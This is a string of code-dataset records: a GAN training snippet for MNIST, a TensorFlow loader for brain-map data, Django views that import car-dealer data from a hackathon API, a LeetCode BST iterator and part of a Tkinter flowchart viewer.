print('epoch %s, D_loss: %s, G_loss: %s'%(e, D_loss_, G_loss_))\n # \n n_rows = 6\n # 将生成的数据Y绘制出来,首先reshape成28*28的矩阵\n check_imgs = sess.run(random_Y, feed_dict={random_X:random_batch_X}).reshape((batch_size, width, height))[:n_rows*n_rows]\n # \n imgs = np.ones((width*n_rows+5*n_rows+5, height*n_rows+5*n_rows+5))\n # 这是做了一个图像的切割么...\n for i in range(n_rows*n_rows):\n imgs[5+5*(i%n_rows)+width*(i%n_rows):5+5*(i%n_rows)+width+width*(i%n_rows), 5+5*(i/n_rows)+height*(i/n_rows):5+5*(i/n_rows)+height+height*(i/n_rows)] = check_imgs[i]\n misc.imsave('out/%s.png'%(e/1000), imgs)\n","sub_path":"reference_models/mnist_gangp.py","file_name":"mnist_gangp.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"29184617","text":"import matplotlib as mpl\r\nfrom glob import glob\r\nimport tensorflow as tf\r\nimport os\r\nimport nibabel as nb\r\nimport numpy as np\r\nfrom nilearn import image\r\nfrom nilearn.plotting import plot_glass_brain\r\nfrom skimage.feature import peak_local_max\r\nimport random\r\nimport io\r\nimport scipy.ndimage\r\n\r\ndef _get_resize_arg(target_shape):\r\n mni_shape_mm = np.array([148.0, 184.0, 156.0])\r\n target_resolution_mm = np.ceil(\r\n mni_shape_mm / np.array(target_shape)).astype(\r\n np.int32)\r\n target_affine = np.array([[4., 0., 0., -75.],\r\n [0., 4., 0., -105.],\r\n [0., 0., 4., -70.],\r\n [0., 0., 0., 1.]])\r\n target_affine[0, 0] = target_resolution_mm[0]\r\n target_affine[1, 1] = target_resolution_mm[1]\r\n target_affine[2, 2] = target_resolution_mm[2]\r\n return target_affine, list(target_shape)\r\n\r\n\r\ndef _get_data(nthreads, batch_size, src_folder, n_epochs, cache, shuffle,\r\n target_shape, add_nagatives, smoothness_levels, cluster_forming_thrs):\r\n paths_ds = tf.data.Dataset.list_files(os.path.join(src_folder, \"*.nii.gz\"),\r\n shuffle=shuffle)\r\n\r\n def read_and_augument(path, target_shape):\r\n\r\n paths_ds = tf.data.Dataset.from_tensors((path,))\r\n\r\n target_affine, target_shape = _get_resize_arg(target_shape)\r\n\r\n def _read_and_resample(path, target_affine, target_shape):\r\n path_str = path.decode('utf-8')\r\n filename = path_str.split(os.sep)[-1]\r\n nii = nb.load(path_str)\r\n data = nii.get_data()\r\n data[np.isnan(data)] = 0\r\n m = np.max(np.abs(data))\r\n data = data / m\r\n nii = nb.Nifti1Image(data, nii.affine)\r\n nii = image.resample_img(nii,\r\n target_affine=target_affine,\r\n target_shape=target_shape)\r\n data = nii.get_data().astype(np.float32)\r\n return data, filename\r\n\r\n data_ds = paths_ds.map(\r\n lambda path: tuple(tf.py_func(_read_and_resample,\r\n [path, target_affine,\r\n target_shape],\r\n [tf.float32, tf.string],\r\n name=\"read_and_resample\"),\r\n ),\r\n num_parallel_calls=2)\r\n\r\n def _smooth(data, filename, target_affine, smoothness_level):\r\n nii = nb.Nifti1Image(data, target_affine)\r\n nii = image.smooth_img(nii, smoothness_level) # !!!!!!\r\n data = nii.get_data()\r\n m = np.max(np.abs(data))\r\n data = data / m\r\n data = data.astype(np.float32)\r\n return data, filename\r\n\r\n smoothed_ds = None\r\n for smoothness_level in smoothness_levels:\r\n if smoothness_level:\r\n tmp_smooth_ds = data_ds.map(\r\n lambda data, filename: tuple(tf.py_func(_smooth,\r\n [data, filename,\r\n target_affine,\r\n tf.constant(smoothness_level)],\r\n [np.float32, tf.string],\r\n name=\"smooth\")),\r\n num_parallel_calls=2)\r\n else:\r\n tmp_smooth_ds = data_ds\r\n\r\n if smoothed_ds is None:\r\n smoothed_ds = tmp_smooth_ds\r\n else:\r\n print(\"concatenate\")\r\n smoothed_ds = smoothed_ds.concatenate(tmp_smooth_ds)\r\n\r\n def _resize_with_filename(data, filename):\r\n reshaped = tf.reshape(data, target_shape)\r\n return reshaped, filename\r\n\r\n resized_ds = smoothed_ds.map(lambda data, filename: _resize_with_filename(data, filename),\r\n num_parallel_calls=2)\r\n\r\n if add_nagatives:\r\n print(\"adding negatives\")\r\n negatives = resized_ds.map(lambda data, filename: (tf.scalar_mul(-1, data), filename),\r\n num_parallel_calls=2)\r\n resized_ds = resized_ds.concatenate(negatives)\r\n\r\n def _extract_peaks(data, cluster_forming_thr):\r\n new = np.zeros_like(data)\r\n new[data > cluster_forming_thr] = 1\r\n labels, n_features = scipy.ndimage.label(new)\r\n for j in range(1, n_features+1):\r\n if (labels == j).sum() < 5:\r\n labels[labels == j] = 0\r\n peaks = peak_local_max(data, indices=False, min_distance=1,\r\n num_peaks_per_label=45,\r\n labels=labels,\r\n threshold_abs=cluster_forming_thr).astype(np.float32)\r\n peaks[peaks > 0] = 1.0\r\n return peaks\r\n\r\n peaks_ds = None\r\n for cluster_forming_thr in cluster_forming_thrs:\r\n\r\n tmp_peaks_ds = resized_ds.map(\r\n lambda data, _: tuple(tf.py_func(_extract_peaks,\r\n [data,\r\n tf.constant(cluster_forming_thr)],\r\n [tf.float32])),\r\n num_parallel_calls=2)\r\n if peaks_ds is None:\r\n peaks_ds = tmp_peaks_ds\r\n resized_ds = resized_ds\r\n paths_ds = paths_ds\r\n else:\r\n peaks_ds = peaks_ds.concatenate(tmp_peaks_ds)\r\n resized_ds = resized_ds.concatenate(resized_ds)\r\n paths_ds = paths_ds.concatenate(paths_ds)\r\n\r\n def _resize(data):\r\n reshaped = tf.reshape(data, target_shape)\r\n return reshaped\r\n\r\n peaks_ds = peaks_ds.map(_resize)\r\n\r\n dataset = tf.data.Dataset.zip((peaks_ds, resized_ds))\r\n\r\n def _filter_empty(peaks, _):\r\n return tf.reduce_sum(peaks) > 0\r\n return dataset.filter(_filter_empty)\r\n\r\n dataset = paths_ds.apply(\r\n tf.contrib.data.parallel_interleave(\r\n lambda path: read_and_augument(path, target_shape),\r\n cycle_length=4))\r\n if cache:\r\n dataset = dataset.cache(cache)\r\n\r\n if shuffle:\r\n dataset = dataset.apply(tf.contrib.data.shuffle_and_repeat(1000, n_epochs))\r\n else:\r\n dataset = dataset.prefetch(1000)\r\n dataset = dataset.repeat(n_epochs)\r\n\r\n dataset = dataset.batch(batch_size)\r\n\r\n return dataset, target_shape\r\n\r\n\r\nclass Peaks2MapsDataset:\r\n\r\n def __init__(self, target_shape, train_batch_size,\r\n validation_batch_size, n_epochs, nthreads=None):\r\n self.target_shape = target_shape\r\n self.train_batch_size = train_batch_size\r\n self.validation_batch_size = validation_batch_size\r\n self.n_epochs = n_epochs\r\n if nthreads is None:\r\n import multiprocessing\r\n self.nthreads = multiprocessing.cpu_count()\r\n else:\r\n self.nthreads = nthreads\r\n\r\n def train_input_fn(self):\r\n self.training_dataset, self.target_shape = _get_data(8,\r\n self.train_batch_size,\r\n \"D:/data/neurovault/neurovault/vetted/train\",\r\n self.n_epochs,\r\n 'D:/drive/workspace/peaks2maps/cache_train_new_thr',\r\n True,\r\n self.target_shape,\r\n True,\r\n smoothness_levels=[0],\r\n cluster_forming_thrs=[0.6])\r\n\r\n # You can use feedable iterators with a variety of different kinds of iterator\r\n # (such as one-shot and initializable iterators).\r\n self.training_iterator = self.training_dataset.make_one_shot_iterator()\r\n return self.training_iterator.get_next()\r\n\r\n def eval_input_fn(self):\r\n self.validation_dataset, validation_shape = _get_data(8,\r\n self.validation_batch_size,\r\n \"G:/My Drive/data/neurovault/neurovault/vetted/eval\", #!!!\r\n #\"D:/data/hcp_statmaps/val_all_tasks\",\r\n 1,\r\n False,\r\n False,\r\n self.target_shape,\r\n False,\r\n smoothness_levels=[8],\r\n cluster_forming_thrs=[0.6])\r\n\r\n self.validation_iterator = self.validation_dataset.make_one_shot_iterator()\r\n return self.validation_iterator.get_next()\r\n\r\n\r\ndef get_plot_op(image, target_shape, summary_label):\r\n mpl.use('agg')\r\n target_affine, _ = _get_resize_arg(target_shape)\r\n target_affine_tf = tf.constant(target_affine)\r\n\r\n def _gen_plot(data, target_affine):\r\n if len(data.shape) == 4:\r\n data = data[0, :, :, :]\r\n args = {\"colorbar\": True,\r\n \"plot_abs\": False,\r\n \"threshold\": 0,\r\n \"cmap\": \"RdBu_r\",\r\n }\r\n nii = nb.Nifti1Image(np.squeeze(data), target_affine)\r\n buf = io.BytesIO()\r\n p = plot_glass_brain(nii, black_bg=False,\r\n display_mode='lyrz',\r\n vmin=-1,\r\n vmax=1,\r\n **args)\r\n p.savefig(buf)\r\n p.close()\r\n buf.seek(0)\r\n val = buf.getvalue()\r\n return val\r\n\r\n plot = tf.py_func(_gen_plot, [image, target_affine_tf], tf.string)\r\n image = tf.image.decode_png(plot)\r\n # Add the batch dimension\r\n image = tf.expand_dims(image, 0)\r\n summary_image = tf.summary.image(summary_label,\r\n image, max_outputs=10)\r\n return summary_image\r\n\r\n\r\ndef save_nii(data, target_shape, path):\r\n target_affine, _ = _get_resize_arg(target_shape)\r\n\r\n nii = nb.Nifti1Image(np.squeeze(data), target_affine)\r\n nii.to_filename(path)","sub_path":"peaks2maps/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":10890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"322263496","text":"from django.http import HttpResponse, JsonResponse\nimport cars.controller as controller\nfrom cars.helpers import getCarDemand, getColorFromDemand\n\nfrom django.shortcuts import render\n\nimport requests\nimport json\nfrom .models import Organization, CarInventory,Lead,OrganizationUnitInventory\n\n\n\n\ndef index(request):\n return HttpResponse(\"Hello, world. You're at the polls index.\")\n\n\ndef car_view(request):\n dealerId = 2\n\n carsByDemand = controller.getCarByDemand(dealerId)\n #dealerName = controller.getDealerName(dealerId)\n dealerName = \"Best Dealer\"\n\n potentials = controller.getPotential(dealerId)\n\n toPartCars = []\n potentialCars = []\n\n print(1)\n\n for car in carsByDemand:\n price = controller.getPrice(car[0], car[1], car[4])\n demand = 3\n toPartCars.append({\n \"inventory_make\" : car[0],\n \"inventory_model\" : car[1],\n \"inventory_frame_style\": car[2],\n \"transmission_type\": car[3],\n \"price\" : price,\n \"sell_rating\": demand,\n \"car_year\": car[4],\n \"photo_url\": controller.getCarImage(car[0], car[1], car[4]),\n \"left\" : True,\n \"color\": getColorFromDemand(demand),\n \"dealer_id\": dealerName,\n \"nVehicles\": 10 #controller.countCar(car[0], car[1], car[4], dealerId)\n })\n\n\n print(2)\n\n for car in potentials:\n price = controller.getPrice(car[0], car[1], car[4])\n #price = 0\n demand = 3\n potentialCars.append({\n \"inventory_make\" : car[0],\n \"inventory_model\" : car[1],\n \"inventory_frame_style\": car[2],\n \"transmission_type\": car[3],\n \"price\" : price,\n \"sell_rating\": demand,\n \"car_year\": car[4],\n \"photo_url\": controller.getCarImage(car[0], car[1], car[4]),\n \"left\" : False ,\n \"color\": getColorFromDemand(demand),\n \"dealer_id\": dealerName,\n \"nVehicles\": 10\n })\n\n\n print(3)\n\n return render(request, 'main_page.html', {'mycars': toPartCars,\n 'othercars': potentialCars,\n \"leftTitle\": \"Mes voitures\",\n \"rightTitle\": \"Voitures \"\n \"potentielles\",\n })\n\n\ndef exchange_view(request):\n offer_2 =2.5\n n_car = 2\n demand = getCarDemand(offer_2, n_car)\n car_data = {\n \"price\": 100.,\n \"inventory_make\": \"Ford toyota\",\n \"inventory_model\": \"RX\",\n \"inventory_frame_style\": \"sedan\",\n \"transmission_type\" : \"AUTOMATIC\",\n \"car_year\": 1992,\n \"photo_url\": \"http://img.sm360.ca/images/var/images/bdc-hackathon-2019/used_car.jpg\",\n \"sell_rating\": int( demand*100),\n \"date_entry\": \"2012-06-02\",\n \"options\": \"Sick rims\",\n \"left\": True,\n \"color\": getColorFromDemand(demand),\n \"nVehicles\": 10,\n }\n mycars = [car_data, car_data]\n othercars = [car_data, car_data]\n for car in othercars:\n car[\"left\"] = False\n exchange_data = {\n \"1\": {\n \"difference\": 1000,\n \"left_units\": 5,\n \"right_units\": 6,\n \"transport_cost\": 300,\n \"mycars\": mycars,\n \"othercars\": othercars,\n },\n\n \"2\": {\n \"difference\": 2,\n \"left_units\": 2,\n \"right_units\": 3,\n \"transport_cost\": 300,\n \"mycars\": mycars,\n \"othercars\": [*othercars, *othercars],\n }\n\n }\n\n return render(request, 'exchange_page.html', {\n \"exchange_data\": exchange_data,\n \"leftTitle\": \"Mes voitures\",\n \"rightTitle\": \"Voitures \"\n \"potentielles\",\n })\n\n\ndef test(request):\n return JsonResponse(controller.getHighestNbLead(3), safe=False)\n\ndef loadData(request):\n loadLeads()\n return HttpResponse(\"Loading data done!\")\n\ndef loadOrgUnitInventory(request):\n apiUrl = 'https://hackathon-api.bdc.n360.io/organization_unit_inventory'\n data = requests.get(apiUrl)\n\n nbPage = data.json()['Infos']['last_page']\n\n invUnits = data.json()['Items']\n\n for unit in invUnits:\n loadUnit(unit)\n\n print(\"Finished loading inventory for page 1\")\n\n for i in range(2, nbPage):\n data = requests.get(apiUrl + \"?page=\" + str(i))\n\n invUnits = data.json()['Items']\n\n for unit in invUnits:\n loadUnit(unit)\n\n print(\"Finished loading inv units for page \" + str(i))\n\n return HttpResponse(\"Loading data done!\")\n\n\ndef loadUnit(invUnit):\n\n #print(\"loading car id \" + str(invUnit['inventory_id']))\n org = Organization.objects.get(organization_unit_id=invUnit['organization_unit_id'])\n inv = CarInventory.objects.filter(inventory_id=invUnit['inventory_id']).first()\n #print(org)\n newInvUnit = OrganizationUnitInventory.create(inventory_id=inv, organization_unit=org)\n newInvUnit.save()\n\n return\n\n\ndef loadLeads(request):\n apiUrl = 'https://hackathon-api.bdc.n360.io/lead'\n data = requests.get(apiUrl)\n\n nbPage = data.json()['Infos']['last_page']\n\n leads = data.json()['Items']\n\n for lead in leads:\n loadOneLead(lead)\n\n print(\"Finished loading inventory for page 1\")\n\n for i in range(2, nbPage):\n data = requests.get(apiUrl + \"?page=\" + str(i))\n\n leads = data.json()['Items']\n\n for lead in leads:\n loadOneLead(lead)\n\n print(\"Finished loading leads for page \" + str(i))\n\n return HttpResponse(\"Loading data done!\")\n\n\ndef loadOneLead(lead):\n #print(lead)\n #print(\"----- Org id:\" + str(lead['organization_unit_id']))\n\n #try:\n org = Organization.objects.get(organization_unit_id=lead['organization_unit_id'])\n #print(org)\n newLead = Lead.create(lead_id=lead['lead_id'], organization_unit_id=org, lead_type_id=lead['lead_type_id'], lead_type=lead['lead_type'], employee_id=lead['employee_id'],\n lead_status_id=lead['lead_status_id'], lead_status=lead['lead_status'], lead_car_info_id=lead['lead_car_info_id'], lead_source_type_id=lead['lead_source_type_id'], lead_source=lead['lead_source'],\n lead_active=lead['lead_active'],\n date_created=lead['date_created'], date_last_modified=lead['date_last_modified'])\n newLead.save()\n #print(\"****** Added new lead ************ \")\n #except:\n # print(\"Failed getting org id: \" + str(lead['organization_unit_id']))\n return\n\n\ndef loadInventory(resource):\n apiUrl = 'https://hackathon-api.bdc.n360.io/car_inventory'\n data = requests.get(apiUrl)\n\n nbPage = data.json()['Infos']['last_page']\n\n inventory = data.json()['Items']\n\n for car in inventory:\n loadInventoryCar(car)\n\n print(\"Finished loading inventory for page 1\")\n\n for i in range(2, nbPage):\n data = requests.get(apiUrl + \"?page=\" + str(i))\n\n inventory = data.json()['Items']\n\n for car in inventory:\n loadInventoryCar(car)\n\n print(\"Finished loading inventory for page \" + str(i))\n return HttpResponse(\"Loading data done!\")\n\n\ndef loadInventoryCar(car):\n newCar = CarInventory.create(car_id=car['car_id'], inventory_id=car['inventory_id'], inventory_make_id=car['inventory_make_id'],\n inventory_make=car['inventory_make'],\n inventory_model_desc_id=car['inventory_model_desc_id'],\n inventory_model=car['inventory_model'], inventory_trim_id=car['inventory_trim_id'], inventory_trim=car['inventory_trim'],\n car_status_id=car['car_status_id'], car_status=car['car_status'],\n inventory_vehicle_category_id=car['inventory_vehicle_category_id'],car_year=car['car_year'], odometer=car['odometer'],\n note=car['note'], option=car['option'], extra_option=car['extra_option'], date_entry=car['date_entry'],\n date_updated=car['date_updated'], date_service=car['date_service'], date_sold=car['date_sold'], inventory_color=car['inventory_color'],\n inventory_interior_color=car['inventory_interior_color'],\n price=car['price'], engine_type=car['engine_type'], drive_train=car['drive_train'], transmission_gear=car['transmission_gear'],\n fuel=car['fuel'], induction=car['induction'],\n cubic_capacity=car['cubic_capacity'], passengers=car['passengers'],\n doors=car['doors'], new=car['new'], demo=car['demo'], certified=car['certified'], clearance=car['clearance'], carproof=car['carproof'],\n transmission_type=car['transmission_type'], commercial=car['commercial'], vehicle_page_views=car['vehicle_page_views'],\n date_created=car['date_created'])\n newCar.save()\n return\n\ndef loadOrgs(request):\n apiUrl = 'https://hackathon-api.bdc.n360.io/organization_unit'\n data = requests.get(apiUrl)\n\n nbPage = data.json()['Infos']['last_page']\n\n organizations = data.json()['Items']\n\n for org in organizations:\n loadOrgIntoDB(org)\n\n print(\"Finished loading orgs for page 1\")\n\n for i in range(2, nbPage):\n data = requests.get(apiUrl + \"?page=\" + str(i))\n\n organizations = data.json()['Items']\n\n for org in organizations:\n loadOrgIntoDB(org)\n\n print(\"Finished loading orgs for page \" + str(i))\n\n print(\"-----Finished loading orgss \")\n return HttpResponse(\"Loading data done!\")\n\n\ndef loadOrgIntoDB(org):\n newOrg = Organization.create(organization_id=org['organization_id'],\n organization_name=org['organization_name'],\n organization_unit_id=org[\n 'organization_unit_id'],\n organization_unit_name=org[\n 'organization_unit_name'],\n address=org['address'],\n city=org['city'],\n postal_code=org['postal_code'],\n phone=org['phone'],\n province_id=org['province_id'],\n fax=org['fax'],\n latitude=org['latitude'],\n longitude=org['longitude'],\n\n )\n\n newOrg.save()\n return\n\n\n\n\n\n\n\n","sub_path":"cars/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"439122985","text":"from common import TreeNode\n\nclass BSTIterator:\n\n def __init__(self, root: TreeNode):\n self.arr = []\n self.helper(root) \n\n def helper(self, root):\n if not root:\n return\n self.helper(root.left)\n self.arr.append(root.val)\n self.helper(root.right)\n \n def next(self) -> int:\n \"\"\"\n @return the next smallest number\n \"\"\"\n return self.arr.pop(0) \n \n\n def hasNext(self) -> bool:\n \"\"\"\n @return whether we have a next smallest number\n \"\"\"\n return len(self.arr) != 0\n\nif __name__ == \"__main__\":\n root = TreeNode(7)\n root.left = TreeNode(3)\n root.right = TreeNode(15)\n root.right.left = TreeNode(9)\n root.right.right = TreeNode(20)\n bst = BSTIterator(root)\n for _ in range(5):\n print(bst.next())\n print(bst.hasNext())","sub_path":"leetcode/tree/binary_search_tree_iterator.py","file_name":"binary_search_tree_iterator.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"511717402","text":"import constants as CONST\nimport nodes\nimport createTree\nimport fileaccess\n\nimport os\nimport subprocess\nimport textwrap\nimport sys\nimport inspect\nimport time\ntry:\n\timport Tkinter\nexcept ImportError:\n\timport tkinter as Tkinter\nfrom PIL import Image,ImageTk\nimport platform\n\nOS = platform.system()\n\nclass ChartFrame(Tkinter.Frame):\n\tdef __init__(self, parent,component):\n\t\tTkinter.Frame.__init__(self, parent)\n\t\tself.parent = parent\n\t\tself.nodeDict = {}\n\t\tself.component = component\n\t\tself.toolTip = []\n\t\tself.zoomScale = 1.0\n\t\tself.icons = {}\n\t\tself.iconImages = {}\n\t\tself.initUI()\n\t\tself.loadIcons()\n\t\n\tdef initUI(self):\n\t\tself.scrollbarV = Tkinter.Scrollbar(self,orient=Tkinter.VERTICAL)\n\t\tself.scrollbarV.pack(side=Tkinter.RIGHT, fill=Tkinter.Y)\n\t\tself.scrollbarH = Tkinter.Scrollbar(self,orient=Tkinter.HORIZONTAL)\n\t\tself.scrollbarH.pack(side=Tkinter.BOTTOM, fill=Tkinter.X)\n\t\t\n\t\tself.parent.title(self.component.upper())\n\t\tself.config(bg = \"#F0F0F0\")\n\t\tself.pack(fill = Tkinter.BOTH, expand = 1)\n\t\t#create canvas\n\t\tself.canvas = Tkinter.Canvas(self, relief = Tkinter.FLAT, background = \"#D2D2D2\",width = 800, height = 600,state=Tkinter.NORMAL)\n\t\tself.canvas.pack(side = Tkinter.LEFT, anchor = Tkinter.NW, expand=True, fill=Tkinter.BOTH, padx = 10, pady = 10)\n\t\t\n\t\tself.canvas.tag_bind(\"ButtonIcon\", \"\", self.setPressedIcon)\n\t\tself.canvas.tag_bind(\"ButtonIcon\", \"\", self.resetPressedIcon)\n\t\tself.canvas.tag_bind(\"JumpToLine\", \"\", self.openExpandedCode)\n\t\tself.canvas.tag_bind(\"HasDetails\", \"\", self.showToolTip)\n\t\tself.canvas.tag_bind(\"HasDetails\", \"\", self.hideToolTip)\n\t\tself.canvas.tag_bind(\"CalledProgram\", \"\", self.createNewWindow)\n\t\t\n\t\tself.canvas.configure(xscrollcommand=self.scrollbarH.set,yscrollcommand=self.scrollbarV.set)\n\t\tself.scrollbarV.config(command=self.canvas.yview)\n\t\tself.scrollbarH.config(command=self.canvas.xview)\n\t\t\n\tdef zoom(self, key):\n\t\tredrawFlag = False\n\t\tzoomAmount = 1.0\n\t\tif key == \"+\" and self.zoomScale < 1.0:\n\t\t\tzoomAmount = 1.1\n\t\t\tredrawFlag = True\n\t\t\n\t\tif key == \"-\" and self.zoomScale > 0.1:\n\t\t\tzoomAmount = 1.0/1.1\n\t\t\tredrawFlag = True\n\t\t\n\t\tif redrawFlag:\n\t\t\tself.zoomScale *= zoomAmount\n\t\t\tself.canvas.scale(\"all\",0,0,zoomAmount,zoomAmount)\n\t\t\n\t\t\tfor iconName in self.iconImages.keys():\n\t\t\t\timg = self.iconImages[iconName]\n\t\t\t\timgResize = (int(i*self.zoomScale) for i in img.size)\n\t\t\t\timg = img.resize(imgResize, Image.ANTIALIAS)\n\t\t\t\tself.icons[iconName] = ImageTk.PhotoImage(img)\n\t\t\t\t\n\t\t\tbuttons = self.canvas.find_withtag(\"ButtonIcon\")\n\t\t\tfor button in buttons:\n\t\t\t\tnode = self.nodeDict[button]\n\t\t\t\tself.canvas.itemconfig(button,image=self.icons[node.idleIcon()],activeimage=self.icons[node.hoverIcon()])\n\t\t\t\n\t\t\tbuttons = self.canvas.find_withtag(\"ButtonText\")\n\t\t\tnewFont = (CONST.FONT[0],1+int(CONST.FONT[1]*self.zoomScale*0.9),CONST.FONT[2])\n\t\t\tfor button in buttons:\n\t\t\t\tself.canvas.itemconfig(button,font=newFont)\n\t\t\t\t\n\t\t\tchartBox = self.canvas.bbox(\"all\")\n\t\t\tchartBorder = 50\n\t\t\tchartBox = (chartBox[0]-chartBorder,chartBox[1]-chartBorder,chartBox[2]+chartBorder,chartBox[3]+chartBorder)\n\t\t\tself.canvas.configure(scrollregion = chartBox)\n\t\t\n\tdef mouseWheelScroll(self, event):\n\t\tif event.delta == 0:\t\t\t# == linux\n\t\t\tif event.num == 4:\n\t\t\t\tscroll = -1\n\t\t\telse:\n\t\t\t\tscroll = 1\n\t\telse:\n\t\t\tscroll = -1 * int(event.delta / 120)\n\t\t\t\n\t\t\t\n\t\tctrlPressed = event.state & (1 << 2)\n\t\t\n\t\tif ctrlPressed:\n\t\t\tif scroll < 0:\n\t\t\t\tself.zoom(\"+\")\n\t\t\telse:\n\t\t\t\tself.zoom(\"-\")\n\t\telse:\n\t\t\tself.canvas.yview_scroll(scroll, \"units\")\n\t\n\tdef loadIcons(self):\n\t\tfor iType in [\"branch\",\"db\",\"file\",\"info\",\"module\",\"process\",\"start\",\"loop\"]:\n\t\t\tfor state in [\"idle\",\"hover\",\"click\"]:\n\t\t\t\timgName = iType + \"-\" + state\n\t\t\t\timg = Image.open(CONST.ICONS + imgName +\".png\")\n\t\t\t\tself.iconImages[imgName] = img\n\t\t\t\tself.icons[imgName] = ImageTk.PhotoImage(img)\n\t\t\n\t\tallNodeClasses = inspect.getmembers(nodes, inspect.isclass)\n\t\tfor nodeClass in allNodeClasses:\n\t\t\tnodeClass = nodeClass[1]\n\t\t\tif nodeClass.iconName:\n\t\t\t\tnodeClass.iconWidth = self.icons[nodeClass.iconName+\"-\"+state].width()\n\t\t\t\tnodeClass.iconHeight = self.icons[nodeClass.iconName+\"-\"+state].height()\n\t\n\tdef newBlock(self,node,x,y):\n\t\tobjId = self.canvas.create_image(x,y,image=self.icons[node.idleIcon()],activeimage=self.icons[node.hoverIcon()],tags=node.tags)\n\t\ttextId = self.canvas.create_text(x,y,text=node.iconText(),font=CONST.FONT,fill=\"#000000\",state=Tkinter.DISABLED,tags=\"ButtonText\")\n\t\t\n\t\tself.nodeDict[objId] = node\n\t\t\n\tdef joiningLine(self,linePoints,bend=False,node=False):\n\n\t\tif len(linePoints) == 4:\n\t\t\tprevX,prevY,curX,curY = linePoints\n\t\t\tif bend == \"N\":\n\t\t\t\tmidY = (prevY + curY)/2\n\t\t\t\tlinePoints = (prevX,prevY,prevX,midY,curX,midY,curX,curY)\n\t\t\telif bend == \"7\":\n\t\t\t\tlinePoints = (prevX,prevY,curX,prevY,curX,curY)\n\t\t\n\t\tif len(linePoints) == 5:\n\t\t\tprevX,prevY,curX,curY,outX = linePoints\n\t\t\tif bend == \"C\":\n\t\t\t\tlinePoints = (prevX,prevY,prevX-outX,prevY,curX-outX,curY,curX,curY)\n\t\t\telif bend == \"-C\":\n\t\t\t\tlinePoints = (prevX,prevY,prevX+outX,prevY,curX+outX,curY,curX,curY)\n\t\t\n\t\tif node:\n\t\t\ttags = (\"Lines\",\"JumpToLine\",\"HasDetails\")\n\t\t\tlineId = self.canvas.create_line(linePoints,fill=\"#000000\",tags=tags,width=2,activewidth=4)\n\t\t\tself.nodeDict[lineId] = node\n\t\telse:\n\t\t\ttags = (\"Lines\")\n\t\t\tself.canvas.create_line(linePoints,fill=\"#000000\",tags=tags,width=1)\n\t\t\t\n\t\tself.canvas.tag_lower(\"Lines\")\n\t\n\tdef setPressedIcon(self,event):\n\t\tcanvas = event.widget\n\t\tobjId = canvas.find_withtag(\"current\")[0]\n\t\t\n\t\tnode = self.nodeDict[objId]\n\t\tcanvas.itemconfig(objId,activeimage=self.icons[node.clickIcon()])\n\t\t\n\tdef resetPressedIcon(self,event):\n\t\tcanvas = event.widget\n\t\tobjId = canvas.find_withtag(\"current\")[0]\n\t\t\n\t\tnode = self.nodeDict[objId]\n\t\tcanvas.itemconfig(objId,activeimage=self.icons[node.hoverIcon()])\n\t\t\n\tdef openExpandedCode(self,event):\n\t\tcanvas = event.widget\n\t\tobjId = canvas.find_withtag(\"current\")[0]\n\t\t\n\t\tnode = self.nodeDict[objId]\n\t\t\n\t\tcomponentLocation = '\"' + fileaccess.extractExpandedFile(self.component) + '\"'\n\t\tlineNo = \"-n\" + str(node.lineNo)\n\t\tcommand = \"\\\"\" + CONST.NPLOCATION + \"\\\"\" + \" \" + componentLocation + \" \" + lineNo\n\t\tif OS == \"Linux\":\n\t\t\tos.system(\"notepad-plus-plus\" + \" \" + componentLocation + \" \" + lineNo)\n\t\telse:\n\t\t\tsubprocess.call(command)\n\t\n\tdef showToolTip(self,event):\n\t\tcanvas = event.widget\n\t\tobjId = canvas.find_withtag(\"current\")[0]\n\t\tif objId in self.toolTip:\n\t\t\treturn\n\t\t\n\t\tself.toolTip.append(objId)\n\t\t\n\t\tpoints = canvas.bbox(objId)\n\t\t#x = (points[0] + points[2])/2\n\t\t#y = (points[1] + points[3])/2\n\t\tx = canvas.canvasx(event.x)\n\t\ty = canvas.canvasy(event.y)\n\t\t\n\t\tnode = self.nodeDict[objId]\n\t\ttext = node.description()\t\t\n\t\tif text:\n\t\t\tlines = text.split(\"\\n\")\n\t\t\tlines = [textwrap.fill(line,CONST.TOOLTIPSIZE) for line in lines]\n\t\t\ttext = \"\\n\".join(lines)\n\t\t\ttextLabel = self.canvas.create_text(x,y,text=text,anchor=\"nw\",font=CONST.TOOLTIPFONT,fill=\"#000000\",tags=\"ToolTip\",state=Tkinter.DISABLED)\n\t\t\ttextBg = self.canvas.create_rectangle(self.canvas.bbox(textLabel),fill=\"white\",tags=\"ToolTip\",state=Tkinter.DISABLED)\n\t\t\tself.canvas.tag_lower(textBg,textLabel)\n\t\t\n\tdef hideToolTip(self,event):\n\t\tcanvas = event.widget\n\t\tobjIds = canvas.find_withtag(\"ToolTip\")\n\t\t\n\t\tself.toolTip = []\n\t\t\n\t\tfor objId in objIds:\n\t\t\tcanvas.delete(objId)\n\t\t\t\n\tdef createNewWindow(self,event):\n\t\tcanvas = event.widget\n\t\tobjId = canvas.find_withtag(\"current\")[0]\n\t\t\n\t\tnode = self.nodeDict[objId]\n\t\tnewComponent = node.moduleName\n\t\tcreateNewWindow(newComponent)\n\t\n\t\nclass ChartWindow(Tkinter.Toplevel):\n\tcharts = {}\n\tdef __init__(self,component):\n\t\tTkinter.Toplevel.__init__(self)\n\t\tcomponent = component.upper()\n\t\t\n\t\tself.chartFrame = False\n\t\tself.component = component\n\t\tself.protocol(\"WM_DELETE_WINDOW\", self.eraseChart)\n\t\t\n\t\tself.createWindow()\n\t\n\tdef eraseChart(self):\n\t\ttry:\n\t\t\tdel ChartWindow.charts[self.component]\n\t\texcept KeyError:\n\t\t\tpass\n\t\tself.destroy()\n\t\n\tdef drawFlowChart(self,nodeList,curX,curY):\n\t\tprevHeight = 0\n\t\tcurrentHeight = 0\n\t\tjoiningLineLength = prevHeight + currentHeight\n\t\tfor node in nodeList:\n\t\t\tprevHeight = currentHeight\n\t\t\tcurrentHeight = node.height()\n\t\t\tjoiningLineLength = prevHeight + currentHeight\n\t\t\t\n\t\t\tif 